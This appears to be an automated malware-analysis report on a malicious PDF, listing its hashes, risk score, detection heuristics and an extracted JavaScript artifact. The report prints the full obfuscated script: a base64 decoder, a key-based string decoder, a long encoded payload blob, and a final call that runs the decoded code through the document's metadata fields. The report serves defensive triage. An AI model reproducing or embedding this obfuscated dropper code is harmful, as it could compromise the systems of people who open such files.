Malicious PDF — malware analysis report

Static analysis result for SHA-256 5351838a8365415b…

MALICIOUS

PDF

6.3 KB Created: 2011-03-02 10:16:46 Authoring application: ZuB8K8KRgPp First seen: 2012-10-18
MD5: 9488f5493dbee4e7074bf217a5155c79 SHA-1: 932fb385e698543effa9aae094001d939b58761d SHA-256: 5351838a8365415bf2147c7d0804a876d1697d6eed9b154a77501490994f2d66
134 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named javascript_obj0008_000.js, is obfuscated and uses String.fromCharCode, suggesting it is designed to download and execute a secondary payload. The presence of obfuscated JavaScript points to a malicious intent, likely to compromise the user's system.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    <</Type/Action/S/JavaScript/JS(\nfunction da\(y95Wa\){var rgEcX='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',wdL='',nFA5ovND,OL,tmfNVN,IYE,IV,zaB3nq,QFHe08e;for\(var u8cBxc=0;u8cBxc<y95Wa.length;\){nFA5ovND=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);OL=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);tmfNVN=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);IYE=rgEcX.indexOf\(y95Wa.charAt\(u8cBxc++\)\);IV=\(nFA5ovND<<2\)+\(OL>>4\);zaB3nq=\(\(OL&15\)<<4\)+\(tmfNVN>>2\);QFHe08e=\(\(tmfNVN&3\ …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x234 5452 bytes
SHA-256: 128980e1068bba61f6b690709ddab97850cc175d40c4c4a6aa33bc36df78249d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 58 of 102 identifiers look randomly generated (e.g. 'gWtwx56Ap42at2qRbo533Ia2kLhnrYFsgYOMxaeK') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function da(y95Wa){var rgEcX='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',wdL='',nFA5ovND,OL,tmfNVN,IYE,IV,zaB3nq,QFHe08e;for(var u8cBxc=0;u8cBxc<y95Wa.length;){nFA5ovND=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));OL=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));tmfNVN=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));IYE=rgEcX.indexOf(y95Wa.charAt(u8cBxc++));IV=(nFA5ovND<<2)+(OL>>4);zaB3nq=((OL&15)<<4)+(tmfNVN>>2);QFHe08e=((tmfNVN&3)<<6)+IYE;wdL+=String.fromCharCode(IV);if(tmfNVN!=64)wdL+=String.fromCharCode(zaB3nq);if(IYE!=64)wdL+=String.fromCharCode(QFHe08e);}
return wdL;}
function zW9hp(SEXhx4F,BZRVQX3K){var KZj='',kyG=0;for(Ki4Qklk=0;Ki4Qklk<SEXhx4F.length;Ki4Qklk++){KZj+=String.fromCharCode(SEXhx4F.charCodeAt(Ki4Qklk)-BZRVQX3K.charCodeAt(kyG++));if(kyG>=BZRVQX3K.length)kyG=0;}
return KZj;}
IaLS=zW9hp(da('ZOujqmuatcXOjZd/6ntohGhwx6CAqYqat3t7a3x33IiykKlnrXxwf4KMxaSKrYRdwHCNhZd15Yq4dmhwrYKKn5SVz62EaY5dwIqpg7Z/6nRogm9wx6uCo4uat2iAfY133JOinaZnrX5oe4mMxaaQuHRdwGp/k6t15ZGqhn5wrYODrYWVz7eFfn1dwIeahqd/6nltgX5wx5+StY6at2iDbZF33ISkkLZnrY9pgJOMxaKTunRdwHCElpt15Z+3h21wrYCTm5aVz611bX1dwIedlbF/6ndtg3Fwx5yGoI6at3CNbYJ33IOzkahnrYJsg5SMxaeSqHVdwHyQgph15ZK3d25wrX2CnoaVz7mHaHxdwJWgg6F/6ndof3Fwx6iUpIuat36Ra3x33IC2jatnrXxsjZeMxaOSpXVdwG9/mJl15Z2mcnBwrXuWqpaVz7l5aHxdwJephKB/6ndwkH5wx6qHo5Oat32Ab4B33Iiyj7pnrX1sf4iMxbSSpXNdwHCNiJ115Y6tcntwrYCIn5KVz6VzaY5dwIqplLF/6np5e2xwx6uIoIuat22QbZF33JOjj6VnrYJ8g5aMxaWRpXpdwHqDh5l15Z22dWtwrYCUn5GVz7Z0fYNdwJitlrZ/6nVokX5wx5+Js4qat359fpB33IS2m7pnrYFtjYqMxaaPp4ddwHmNiZ915ZOteG5wrYyUnYaVz6uFentdwJWbiKh/6ndohHBwx52WppKat2qQbpB33IaokKlnrYJqgoeMxaaeq4VdwHqDh5t15Y66en1wrZCVl5WVz6p3fpFdwIuagKR/6nVpgGhwx5yAs4qat22BbXt33IWlkrdnrYNre4aMxaeguHRdwHt9ipp15Y+ndWlwrY2KnICVz6aDa4FdwImXgrZ/6ndtkX5wx5ySoI6at36Ra3x33IWmj6xnrYRwjYqMxaibu4ddwH6Rgqx15Yqpd21wrY2KnIeVz7iHfZFdwIiXlaB/6ndtkX5wx52IoI6at29/b3933IOxkaVnrX1+fZiMxaaPrINdwG6DiZt15ZGqeG9wrX2XnYSVz6uIbn5dwIiagrV/6nR+gWtwx56Ap42at2qRbo533Ia2kLhnrYFsgYOMxaeKp4ddwG97iJ915ZCqdX5wrX6EmpSVz6VyaHtfhrjcvtPO3rGma53FyNl44ruhs7F0s8K60LzVguejZredubnbuJqMsbOxdLO9s5KN4ruwv0K9mYjEyH7jz9e1rL2hubmPgJzL7nFqdHO9t9vF4siVtJmGtVW43L7Tzt6xpmuaw3qQy+a752Kctp+IwMzHkJvntJnEYHSN3bHieuu5dXuwe7WXs6C9paVzwZm9csi01MyycrB/aHuCl4Cr0Na0WLuZxL7WsdSX6rCdvpuswsx40sToqWGGrqzEh8PTueGnpoiorMvTv9G+o66duZ+/upGCq9DWtFi8sYizy7Tih521m6qksMCSgOiNrWtzwZm9cuCx4s3lf625nb61yMDVgpdnrYRohIKMxamKrnJadHPEs9nD4JfavK69YMSz2cPghua7YYaurMSHs9/P47ZqiGDByZSA6I6lcmh7aHSByLTUzLCop71gwbPZcNPJ6rCsiGiGtdbF3s6xpafApr+EorPfz+O2Y3ZhxrbSt8u95Lemv5WIy8jC48qgspnEpLqzy4vtZOujqmunwbfZttzJ7H+tuZ2+tcjA1YKXZ617m3u1jMWgvaWlWnRzwrrQvNWC5LidvZ63wd5+3L/jqayzdH+GoIWig/CxrrCqsb7Wx5uX5LidvZ63wd6L7WTpqqG+Zq7B07zRvMi2p72diJXWvNy713CbuqS3t8rEtcfWq6SUprHBj8vjz9escm1ad7/at6rJ66eqsaS6yeR5q9d/qK25m7+71r6Qyuerpr+ec3vivt/KsremsKuus9e1mHyat2iMaIx33ICxirZnrXt5e5OMxaCbpYNadHPBs9lw4LvurqesnIjH1bXjvdaynXOatcXOeavC2qOoraS6tdKN3snlbaissbfByLSrvN6pmrenrr2kxd6/6KWZu51zdIzFoJulg13AaIyCqHKZld2nma+dvcXQytWXp3Jzvqi9s+CN2L/Wpp29q7TMzHvYv9aymrenrr2VvNXI3Laghq+zu9O1mLzeqZq3p669lbzVyNy2oIeru8TIyZnV16ufraS6tdJ7rbzeqZq3p669os16wN6upK2kurXSjdLD3KSkupu2gNrF0s3ptKG5n3OCk8PgzNa7YYaat8HKu6283qmat6euvZXD5bzotqq0prJ6l3zSw9ykpLqbtoDTtd7B6aplvqi9s+B5q9Hdq6SwYK2+1rPbiOGnprKss33awOK77n5ow2x7gpeAmdXXrqeuo4i007/TxaCkpLqbtn3NudzG166nrqOGz3G91ceysJ3CWIzE2bHpgp59nrqqc7ukgKvDsXNse2iGu5J7mdXip6WmoaiPybzfveBtoLCZu7TTv9PFsL9CwZm9ctXF3ZemdHGEcYSLoImpk657cYRxhIugiaiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJKtenCDcIOKn4iokq16cINwg4qfiKiSrXpwg3CDip+IqJXqtqG3ZrvE0L7kwJ1kXX9te4KXtpKG47eldHPIXM3F3r3pq6e5WLK327nTyeNqYcaurMSHseLM7n+msK9rk9nC0dOda3O0nnOz18CevuSlZo6nt77Isp7B2raBrqe5e+LG0cyVspnEpLqzy43lyNq1m6yosHrJuuPBnn2urKprur7BpYqlhYaIqKzL07/RvqOunbmfv7qRgqvQ1rRYvLGIgt+EoIqlcmh4YLOp2IWgiriQY3uwfoqQi+a752KxrKq+wqTF3r/opZm7nXN0jMWpiq5yXcBxe4uXcpmV7qOqvqiIt+HG4oLuo6q+qHfD4Hmr0Na0WLttjLyyhqXAsmpow2iugsqA04rYb2jDbHuCl4Cgg6RysH9oe4KXgKvA5LRgwZm9ct3B06u5e27EdXuN3cHTq7l7bsR0u4eouruQqqhzwamuo6uJptOgbWHGmb3E4Kvmy9iTfIRuxK+kydHM6LJju5nEvtax1JXyTK6sqmvGvJ3YqNeJr4itubfas9HK2mpacGiEdJCL58Lerp1zrKCfz57SoexwpLCmssbPjKDSqXJoe2HGxryd2KjXia92db+ntLi+vLy5c8hCv6e0uL68vLl1bYZ5dJLExafdkJqSr4az18CevuSlZo6nt77Isp7B2raBrqe5etulvcLDpH/CYYbP5FrRquG3n7Smvo/IwOCI5a6tsoG5xaLG0cyVta6IqKzE2rW5yOlqmbuoecjQtee/55idvau0wdV+5MnItqq0prJ6kH7Twta0eb9ge3uQi9bJ52qurKpru6SAq8Oxo4i3rbK71cOextqwn7+ghruSe5nV3qhgrIi3x8653s3Qq5V5pqy/zI2tgbqVm72hu8aOeevQ1rRYt66Is7e85cHesKumoaiA3bXizd6xpoa1yFzQtpiC4bh1iHF0zuN4mM3rf3WDYXF4j7zmlrJ6ZnxqdHuQy9e/6aubuqZze6LN1cbop1i0nnO+3Y2tkaNzYcaovbvVxNaCnn21sKS+t4e51oKdaqvBdYiIkMzsgui4dYhvdHuNdpjG635veWl8e5DL0tKda3PInbfFzHDZwJ1qpMF2iIuVgZnW8WqkwXSIi5WCmdbxaqTBdoiKlYGjg/G+YLeuh4+ffqGRnmuzsa25tdu538iVo2B0s8DG0Lyeyuerpr+cc3nXkKGLpnNpfGl8g5iBoYumc2l8aXyDmIGhi5V8WMSxxMuYgaGBobCdwliPs9u1mIOefbVVrqzEh7itu+WyZrukwLmwvuOV27Gqc66sxIe2rYqwqHSzZre31bfkwrCoY3ZhxrvNeNi1259muZm4t6SNl5/Ipaq0qL95kMvmu+dioYigprjEfua/57WhuqaGz+Ra2cCdaqGJcHmDmXmWgJ2rdINmfXuQy9OX46eva3m9xMjJmIOwuJm9WK+P3L7VzdijqLBgcnfciaCTpWethGiEgo55q9DWtFiwdcDAzMPTu+WnYK2ivrmQi+fC3q6dc5x5vsy+187dfnV7sIOCl4CZ1dltda9zyFzLjdSI6Leavqy9epd8oNKtcmh7ZbCA07XewemqYYaeusSPtq2KsKh0fXF7gqK2m4WevZumnqiPy3vVlfJMmXNhhrOPeavO57uzv6C0xZW91b7eo2a5ncKi07Hpv+dqpsCkt3uizdO76aWgc510zeRa0YKefbXI'),this.producer);_Uv0xF9=this.author;oF=this[_Uv0xF9];oF(IaLS);